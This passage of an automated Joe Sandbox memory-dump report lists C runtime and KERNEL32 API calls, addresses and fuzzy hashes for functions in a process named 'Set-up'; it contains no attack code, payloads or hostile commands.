                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000), ref: 6BB988C7
                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,00000000), ref: 6BB988F3
                                                                                              • TlsGetValue.KERNEL32(?,?,00000028,6BBA297A,00000000,?,00000000,?,?,6BBA2BA8,00000000,?,?,?,?,00000000), ref: 6BB98915
                                                                                              • TlsSetValue.KERNEL32(?,00000000,?,6BBA2BA8,00000000,?,?,?,?,00000000,00000000), ref: 6BB98920
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Version@$Concurrency@@Manager@1@Resource$AffinityCriticalCurrentMaskProcessSectionThreadValue_memset$EnterEventH_prolog3_Leave
                                                                                              • String ID:
                                                                                              • API String ID: 4131446515-0
                                                                                              • Opcode ID: d2bfb2c4bef7149b1db35eb9fd5e273293f1a20693287e32ee77b10d50e99b5b
                                                                                              • Instruction ID: ebf59ea28af69a892365ce6a3745bb465fcc64575b171b2da955120ff3ce2694
                                                                                              • Opcode Fuzzy Hash: d2bfb2c4bef7149b1db35eb9fd5e273293f1a20693287e32ee77b10d50e99b5b
                                                                                              • Instruction Fuzzy Hash: F8315576A00255CFCF04EF60D8C5AAE7BB5FF09314B0954A9EC05AF256DB38E941CBA1
                                                                                              APIs
                                                                                              • _strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9
                                                                                                • Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
                                                                                                • Part of subcall function 6BB6EFF6: _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061
                                                                                              • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,74DE8406,?,00000005,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?), ref: 6BB762B7
                                                                                              • _errno.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C496
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4A1
                                                                                              • _errno.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4BC
                                                                                              • _invalid_parameter_noinfo.MSVCR100(7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4C7
                                                                                              • _errno.MSVCR100(?,?,?,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB8C4CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_tolower_l$CompareString__crt_strnicmp_l
                                                                                              • String ID:
                                                                                              • API String ID: 1585791229-0
                                                                                              • Opcode ID: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
                                                                                              • Instruction ID: 767e1e74659f209225dcb58bdd63110fc14bb7cddd5752c5df8ebf7224de5d16
                                                                                              • Opcode Fuzzy Hash: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
                                                                                              • Instruction Fuzzy Hash: 422191B19002C9AFDF21AFB4CC81ABD7775EF01324B1443A9E4345B1E0EB398991DB92
                                                                                              APIs
                                                                                              • _tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
                                                                                              • _tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061
                                                                                              • ___ascii_strnicmp.LIBCMT ref: 6BB77686
                                                                                              • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C408
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C413
                                                                                              • _errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C42F
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C43A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
                                                                                              • String ID:
                                                                                              • API String ID: 2390777603-0
                                                                                              • Opcode ID: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
                                                                                              • Instruction ID: d917048591e9c6fcd1c07d2092531c1e7ce88f4f850bebd61432199d74186f97
                                                                                              • Opcode Fuzzy Hash: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
                                                                                              • Instruction Fuzzy Hash: E4219C719002D99FDF21DEB8C845BBE3BA4EF412A4F2406A8A4305B1D5FB78CD45CBA1
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB89225
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89230
                                                                                              • _errno.MSVCR100(?), ref: 6BB8923D
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB89248
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: B
                                                                                              • API String ID: 2959964966-1255198513
                                                                                              • Opcode ID: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
                                                                                              • Instruction ID: 8dc3d96e63e56a5f5351839fba992b6c4b673d20857b71af5e9c6a99eea0742a
                                                                                              • Opcode Fuzzy Hash: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
                                                                                              • Instruction Fuzzy Hash: 5521747280029ADFDF109FB8D8815DE7BB4FB49364F14466AE520A7280E778D9108FA5
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6BB6AEB8
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6BB6AEF6
                                                                                              • _malloc_crt.MSVCR100(00000000), ref: 6BB6AF00
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 6BB6AF19
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF24
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 3279498665-0
                                                                                              • Opcode ID: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
                                                                                              • Instruction ID: 15138715d884ccd037e5fda855e301688dd3805a03e433cbb5d80cef5e3e3bb9
                                                                                              • Opcode Fuzzy Hash: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
                                                                                              • Instruction Fuzzy Hash: DF118FA2902578BF8F116FB59D888AFBBBCEE467D075044A1F002D3140E6798D408AA2
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB98ACB
                                                                                                • Part of subcall function 6BB962F7: __EH_prolog3.LIBCMT ref: 6BB962FE
                                                                                                • Part of subcall function 6BB962F7: ??2@YAPAXI@Z.MSVCR100 ref: 6BB96366
                                                                                                • Part of subcall function 6BB962F7: _memset.LIBCMT(00000000,00000000,B5104C15), ref: 6BB96378
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,6BBA0AF2,?,00000001,00000010,6BBA0C38,00000000,00000000,6BBA0AF2,?,6BBA0AF2,?), ref: 6BB98AFB
                                                                                              • GetLastError.KERNEL32(?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B0B
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B23
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B31
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,5D8B5351,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B43
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB98B78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@H_prolog3$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1121080609-0
                                                                                              APIs
                                                                                              • _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                              • _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A745: __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
                                                                                                • Part of subcall function 6BB6A745: _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
                                                                                                • Part of subcall function 6BB6A745: _invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              • _get_osfhandle.MSVCR100(00000002), ref: 6BB75A6F
                                                                                              • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6BB75A78
                                                                                              • GetLastError.KERNEL32 ref: 6BB8F4C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1012986785-0
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB701E4
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902F6
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902FE
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90314
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB9031F
                                                                                              • _errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90326
                                                                                              • __doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90331
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB7022F: _isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
                                                                                                • Part of subcall function 6BB7022F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                                                                              • String ID:
                                                                                              • API String ID: 3635451409-0
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB71424
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB90398
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903A0
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903B6
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB717A8,00000010), ref: 6BB903C1
                                                                                              • _errno.MSVCR100(6BB717A8,00000010), ref: 6BB903C8
                                                                                              • __doserrno.MSVCR100(6BB717A8,00000010), ref: 6BB903D3
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB716B5: _get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
                                                                                                • Part of subcall function 6BB716B5: SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$CriticalEnterFilePointerSection_get_osfhandle_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 593789910-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::
                                                                                              • String ID: throw(
                                                                                              • API String ID: 168861036-3159766648
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?), ref: 6BB98BE8
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BB98BEB
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF2
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF5
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BFF
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98C17
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BB98C25
                                                                                              Similarity
                                                                                              • API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 2881127307-0
                                                                                              APIs
                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 6BBDF713
                                                                                              • __FindPESection.LIBCMT ref: 6BBDF72D
                                                                                              Similarity
                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                              • String ID:
                                                                                              • API String ID: 876702719-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB99F16
                                                                                              • TlsSetValue.KERNEL32(?), ref: 6BB99F29
                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BB9A08D
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9A0B2
                                                                                              • _CxxThrowException.MSVCR100(?,6BB9A0C8), ref: 6BB9A0C0
                                                                                              • std::exception::exception.LIBCMT(?,?,?,6BB9A0C8), ref: 6BB9A0E3
                                                                                              Similarity
                                                                                              • API ID: Value$Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1797647509-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 508512864-0
                                                                                              APIs
                                                                                              • _lock.MSVCR100(0000000B,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C12D
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • EnterCriticalSection.KERNEL32(?,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1A8
                                                                                              • _lock.MSVCR100(0000000A,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1FA
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C215
                                                                                              • _calloc_crt.MSVCR100(00000020,00000040,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB904BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Enter_lock$CountInitializeSpin_calloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 988982517-0
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6BB652A5,?,?,?), ref: 6BB651E5
                                                                                              • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?), ref: 6BB6522B
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BB65240
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6BB6524E
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB65258
                                                                                              • malloc.MSVCR100(00000008,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB90CF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2935806426-0
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87946
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87950
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB8795C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87966
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87972
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              APIs
                                                                                              • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB69260
                                                                                                • Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D
                                                                                              • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6BB69273
                                                                                              • _errno.MSVCR100(?), ref: 6BB8C4F8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB8C503
                                                                                              • _errno.MSVCR100(?,?), ref: 6BB8C51E
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB8C529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                                                                              • String ID:
                                                                                              • API String ID: 3991495309-0
                                                                                              APIs
                                                                                              • _strnicoll_l.MSVCR100(?,?,?,?,74DE8406,?,?,?,?,?,?), ref: 6BB72115
                                                                                                • Part of subcall function 6BB7204F: _strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAE4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAEF
                                                                                              • _errno.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB0A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB15
                                                                                              • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,?,?,00000000,74DE8406,?,?,?,?,?,?), ref: 6BB8AB33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
                                                                                              • String ID:
                                                                                              • API String ID: 1477060370-0
                                                                                              APIs
